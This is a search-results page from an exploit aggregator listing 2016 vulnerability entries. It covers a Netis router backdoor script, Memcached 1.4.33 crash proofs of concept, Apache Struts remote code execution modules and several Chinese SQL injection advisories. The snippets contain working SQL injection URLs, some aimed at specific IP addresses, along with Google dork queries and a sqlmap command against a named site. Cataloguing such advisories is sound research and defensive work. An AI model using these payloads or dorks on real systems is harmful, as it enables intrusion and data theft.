Lucene search
+L

117 matches found

Exploit DB
Exploit DB
added 2016/12/15 12:0 a.m.76 views

Netcore / Netis Routers - UDP Backdoor Access

!/usr/bin/python -- coding: utf8 -- NETCORE / NETDIS UDP 53413 BACKDOOR https://netisscan.shadowserver.org/ http://blog.trendmicro.com/trendlabs-security-intelligence/netis-routers-leave-wide-open-backdoor/ https://www.seebug.org/vuldb/ssvid-90227 import socket import struct import logging...

7.4AI score
Exploits0
seebug.org
seebug.org
added 2016/11/10 12:0 a.m.15 views

Microsoft Windows Internet Explorer the animation Manager memory corruption vulnerability (MS16-132)

Exploitation Exploitation of this vulnerability requires a user to visit a page containing specially crafted JavaScript. Users can generally be lured to visit web pages via email, instant message or links on the internet. Vulnerabilities like thisare often hosted on legitimate websites which have...

7.1AI score
Exploits0
0day.today
0day.today
added 2016/11/03 12:0 a.m.24 views

Memcached 1.4.33 - PoC (2)

Exploit for linux platform in category dos / poc Source: http://paper.seebug.org/95/ import struct import socket import sys MEMCACHEDREQUESTMAGIC = "\x80" OPCODEADD = "\x02" keylen = struct.pack"!H",0xfa extralen = "\x08" datatype = "\x00" vbucket = "\x00\x00" bodylen = struct.pack"!I",0xffffffd0...

7AI score
Exploits0
0day.today
0day.today
added 2016/11/03 12:0 a.m.29 views

Memcached 1.4.33 - PoC (1)

Exploit for linux platform in category dos / poc Source: http://paper.seebug.org/95/ import struct import socket import sys MEMCACHEDREQUESTMAGIC = "\x80" OPCODEPREPENDQ = "\x1a" keylen = struct.pack"!H",0xfa extralen = "\x00" datatype = "\x00" vbucket = "\x00\x00" bodylen = struct.pack"!I",0...

7.4AI score
Exploits0
0day.today
0day.today
added 2016/11/03 12:0 a.m.23 views

Memcached 1.4.33 - PoC (3)

Exploit for linux platform in category dos / poc Source: http://paper.seebug.org/95/ import struct import socket import sys MEMCACHEDREQUESTMAGIC = "\x80" OPCODESET = "\x21" keylen = struct.pack"!H",32 bodylen = struct.pack"!I",1 packet = MEMCACHEDREQUESTMAGIC + OPCODESET + keylen + bodylen2 +...

7AI score
Exploits0
Exploit DB
Exploit DB
added 2016/11/01 12:0 a.m.35 views

Memcached 1.4.33 - 'Crash' (PoC)

Source: http://paper.seebug.org/95/ import struct import socket import sys MEMCACHEDREQUESTMAGIC = "\x80" OPCODEPREPENDQ = "\x1a" keylen = struct.pack"!H",0xfa extralen = "\x00" datatype = "\x00" vbucket = "\x00\x00" bodylen = struct.pack"!I",0 opaque = struct.pack"!I",0 CAS = struct.pack"!Q",0...

7.4AI score
Exploits0
Kitploit
Kitploit
added 2016/08/03 9:18 p.m.16 views

Pocsuite - Remote Vulnerability Testing Framework Developed By The Knownsec Security Team

Pocsuite is an open-sourced remote vulnerability testing and PoC development framework developed by the Knownsec Security Team. It serves as the cornerstone of the team. You can use Pocsuite to verify and exploit vulnerabilities or write PoC/Exp based on it. You can also integrate Pocsuite in you...

7.5AI score
Exploits0References1
seebug.org
seebug.org
added 2016/06/15 12:0 a.m.35 views

Shanghai Zhuo fan cms government service center/index/downLoadFile. action download vulnerability

http://xxx.com/index/downLoadFile.action?fileName=web.xml&filePath=WEB-INF/web.xml...

7.1AI score
Exploits0
Metasploit
Metasploit
added 2016/06/06 10:7 a.m.31 views

Apache Struts REST Plugin With Dynamic Method Invocation Remote Code Execution

This module exploits a remote command execution vulnerability in Apache Struts version between 2.3.20 and 2.3.28 except 2.3.20.2 and 2.3.24.2. Remote Code Execution can be performed when using REST Plugin with ! operator when Dynamic Method Invocation is enabled. This module requires Metasploit:...

9.8CVSS7.8AI score0.81087EPSS
Exploits4
seebug.org
seebug.org
added 2016/05/30 12:0 a.m.34 views

金蝶某系统存在远程命令执行

简要描述: 金蝶某系统存在远程命令执行 详细说明: http://118.194.40.105/ 为discuz,且服务器存在redis服务,通过ssrf WooYun: Discuz!另一处SSRF无须登陆无须条件 可以更改discuz缓存代码,从而实现远程命令执行。 设置 还原 漏洞证明:...

7.1AI score
Exploits0
n0where
n0where
added 2016/05/25 12:16 p.m.29 views

Remote Vulnerability Testing Framework: Pocsuite

Pocsuite is an open-sourced remote vulnerability testing and proof-of-concept development framework developed by the Knownsec Security Team. It comes with a powerful proof-of-concept engine, many niche features for the ultimate penetration testers and security researchers. Requirements Python 2.6...

8AI score
Exploits0References1
seebug.org
seebug.org
added 2016/05/09 12:0 a.m.21 views

1caitong电子采购系统 CheckUser.asp 参数USERNAME SQL注入漏洞

0x01漏洞简介 北京网达信联科技发展有限公司http://www.1caitong.com研发的1caitong电子采购系统在/rat/Supplier/CheckUser.asp对参数USERNAME过滤不严格,导致出现SQL注入漏洞。远程攻击者可以利用该漏洞执行SQL指令。 0x02漏洞利用 http://.com/rat/Supplier/CheckUser.asp?USERNAME=' and @@version=0-- 0x03修复方案 过滤。或者采用参数化的SQL语句。...

7.1AI score
Exploits0
Packet Storm
Packet Storm
added 2016/04/30 12:0 a.m.50 views

Apache Struts 2.3.28 Dynamic Method Invocation Remote Code Execution

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class MetasploitModule 'Apache Struts Dynamic Method Invocation Remote Code Execution', 'Description' = %q This module exploits a remote command...

9.3CVSS0.6AI score0.9373EPSS
Exploits12
seebug.org
seebug.org
added 2016/01/25 12:0 a.m.17 views

远古流媒体系统 query_user_password_qustion.aspx SQL 注入漏洞

/viewgood/webmedia/portal/queryuserpasswordqustion.aspx?username=1%27%20AND%201%3DCONVERT%28int%2C%20CHAR%28116%29%20%2b%20CHAR%28121%29%20%2b%20CHAR%28113%29%2b@@version%2b%20CHAR%28116%29%20%2b%20CHAR%28121%29%20%2b%20CHAR%28113%29%29%20AND%20%271%27%3D%271...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2016/01/25 12:0 a.m.17 views

远古流媒体系统 pic_proxy.aspx SQL 注入漏洞

/viewgood/webmedia/portal/picproxy.aspx?id=1%20and%201%3Dconvert%28int%2C%20CHAR%28116%29%20%2b%20CHAR%28121%29%20%2b%20CHAR%28113%29%2bdbname%2b%20CHAR%28116%29%20%2b%20CHAR%28121%29%20%2b%20CHAR%28113%29%29--&type=2...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2016/01/21 12:0 a.m.260 views

用友GRP系统sql 注入漏洞

用友GRP系统sql注射 /R9iPortal/cm/cminfocontent.jsp 参数 infoid http://221.2.68.102:8888/R9iPortal/cm/cminfocontent.jsp?infoid=-8431%20UNION%20ALL%20SELECT%2067,67,user,67,67,67,67,67,67,67,67,67,67,67--...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2016/01/21 12:0 a.m.15 views

中软政务系统Technological.aspx 参数id SQL注入漏洞

SQL Injection: /ExtendForm/Down/Technological.aspx?id=1 不过使用的数据库功能有限,没有什么核心内容。...

7.6AI score
Exploits0
seebug.org
seebug.org
added 2016/01/20 12:0 a.m.19 views

4a网络教学平台relatedMaterial.jsp resId参数SQL注入漏洞

4a网络教学平台relatedMaterial.jsp resId参数SQL注入漏洞 relatedMaterial.jsp中的resid参数存在注入 可以用sqlmap直接跑。 这个是正常的。 这个是不正常的。我也是醉了。...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2016/01/20 12:0 a.m.439 views

jeecms V2.4.2 ArtiSearch.do 远程命令执行漏洞

0x01 框架概述 江西金磊科技发展有限公司(以下简称金磊科技)成立于2003年,旗下产品JEECMS内容管理系统是国内java开源CMS行业知名度最高、用户量最大的站群管理系统。金磊科技是一家专注java WEB应用软件研发高新技术企业。Jeecms是基于java技术研发的站群管理系统,稳定、安全、高效、跨平台、 无限扩展是jeecms 的优点,系统支持mysql、oracle、sqlserver、db2等主流 数据库。 主页:http://www.jeecms.com 0x02 漏洞细节 谷歌搜索:inurl:jeecms/ArtiSearch.do 涉及大量案例 漏洞证明:...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2015/12/30 12:0 a.m.25 views

joomla com_Nice Ajax Poll 1.4.0 组件SQL注入漏洞

1.google 语法: inurl:"/index.php?option=comniceajaxpoll" 2.随便打开一个网站,利用sqlmap 进行注入. sqlmap.py -u "http://www.cevosop.com/index.php?option=comniceajaxpoll&getpliseid=" --current-user...

7.1AI score
Exploits0
Rows per page
Query Builder